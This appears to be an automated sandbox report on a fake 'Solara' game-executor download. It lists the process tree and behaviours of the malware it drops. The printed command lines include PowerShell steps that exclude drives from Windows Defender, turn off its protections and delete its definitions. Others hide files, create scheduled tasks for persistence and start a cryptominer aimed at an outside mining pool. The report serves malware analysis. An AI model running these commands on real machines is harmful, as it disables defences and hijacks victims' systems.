msedge.exepid process 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
Solara NEW.exejavaw.exeWinSFX.exeWinDefender.exeMpWinDefenderService.exeMpDefenderCoreService.exeMpWinDefenderService.exeMpCmdRun.exeMpCmdRun.exepid process 1852 Solara NEW.exe 1084 javaw.exe 1084 javaw.exe 5684 WinSFX.exe 5992 WinDefender.exe 4844 MpWinDefenderService.exe 3164 MpDefenderCoreService.exe 5136 MpWinDefenderService.exe 4480 MpCmdRun.exe 3296 MpCmdRun.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 1068 wrote to memory of 2308 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 2308 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1056 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1008 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 1008 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe PID 1068 wrote to memory of 4060 1068 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 4200 attrib.exe 1756 attrib.exe 7148 attrib.exe 6264 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://raw.githubusercontent.com/ByterCode/Solara-Excutor/refs/heads/main/Solara%20NEW.zip1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffa300946f8,0x7ffa30094708,0x7ffa300947182⤵PID:2308
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:22⤵PID:1056
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1008 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:82⤵PID:4060
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:12⤵PID:3952
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:12⤵PID:4892
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:82⤵PID:692
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
PID:1140 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x2ac,0x2b0,0x2b4,0x288,0x2b8,0x7ff76beb5460,0x7ff76beb5470,0x7ff76beb54803⤵PID:4728
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4204 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:12⤵PID:2436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:12⤵PID:440
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:12⤵PID:1724
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:12⤵PID:1700
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6312 /prefetch:82⤵PID:5012
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:12⤵PID:4616
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,7039346379862285325,14413468808244063676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7064 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2380
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3656
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2440
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1804
-
C:\Users\Admin\Downloads\Solara NEW\Solara NEW.exe"C:\Users\Admin\Downloads\Solara NEW\Solara NEW.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1852 -
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\Solara NEW\Solara NEW.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1084 -
C:\Windows\SYSTEM32\reg.exereg query HKLM\HARDWARE\DESCRIPTION\System /v SystemBiosVersion3⤵
- Checks BIOS information in registry
- Modifies registry key
PID:1304 -
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get model3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4824 -
C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinSFX.exeC:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinSFX.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5684 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows\Defender\9MtIZXiAw.vbe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5872 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows\Defender\Es1BthyXvq2km5CiHkXHry3WVfzj.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:4044 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe"C:\Users\Admin\AppData\Roaming\Windows/Defender/RunShell.exe"6⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies registry class
PID:2548 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3rhbxqqw\3rhbxqqw.cmdline"7⤵
- Drops file in System32 directory
PID:5504 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA88.tmp" "c:\Windows\System32\CSCF2DDC31CC0FA4B7587773868A7DDDFE8.TMP"8⤵PID:6812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\cmd.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:6244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Cookies\fontdrvhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\agentComponentFontNet\cmd.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:6224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\conhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\timeout.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:6156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5476 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FoHCCQ6KPa.bat"7⤵PID:1252
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5968
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1760 -
C:\Users\Public\Music\cmd.exe"C:\Users\Public\Music\cmd.exe"8⤵PID:5652
-
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinHelper32.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinHelper32.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:5936 -
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit5⤵PID:2940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"6⤵
- Command and Scripting Interpreter: PowerShell
PID:6760 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdater" /tr "C:\Windows\system32\GoogleUpdater.exe"5⤵PID:5496
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdater" /tr "C:\Windows\system32\GoogleUpdater.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:5656 -
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Windows\system32\GoogleUpdater.exe"5⤵PID:6796
-
C:\Windows\system32\GoogleUpdater.exeC:\Windows\system32\GoogleUpdater.exe6⤵PID:4428
-
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵PID:2116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Command and Scripting Interpreter: PowerShell
PID:6712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Command and Scripting Interpreter: PowerShell
PID:5728 -
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵PID:5884
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=4BHDQDtdSK2c9CQxpSptzvgbXgQ664JTqEnBvuXeueNLGGg7CYHPtQNEnZ3YK9MQgbE6dsg92yX4B6QXpG3v7HAS2nGUBKr --pass=x --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth7⤵PID:5236
-
C:\Users\Admin\AppData\Roaming\Windows\Defender\WinDefender.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\WinDefender.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5992 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinSDK.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinSDK.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5400 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"' & exit6⤵PID:5736
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"'7⤵
- Scheduled Task/Job: Scheduled Task
PID:7056 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEE33.tmp.bat""6⤵PID:5460
-
C:\Windows\system32\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:6696 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"7⤵
- Executes dropped EXE
PID:6660 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderRuntime.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderRuntime.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6064 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4844 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5136 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe'"6⤵PID:5704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2092 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"6⤵PID:3312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1304 -
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All7⤵
- Deletes Windows Defender Definitions
- Suspicious use of SetWindowsHookEx
PID:3296 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe""6⤵
- Hide Artifacts: Hidden Files and Directories
PID:5752 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"7⤵
- Views/modifies file attributes
PID:1756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"6⤵PID:5780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5220 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:4716
-
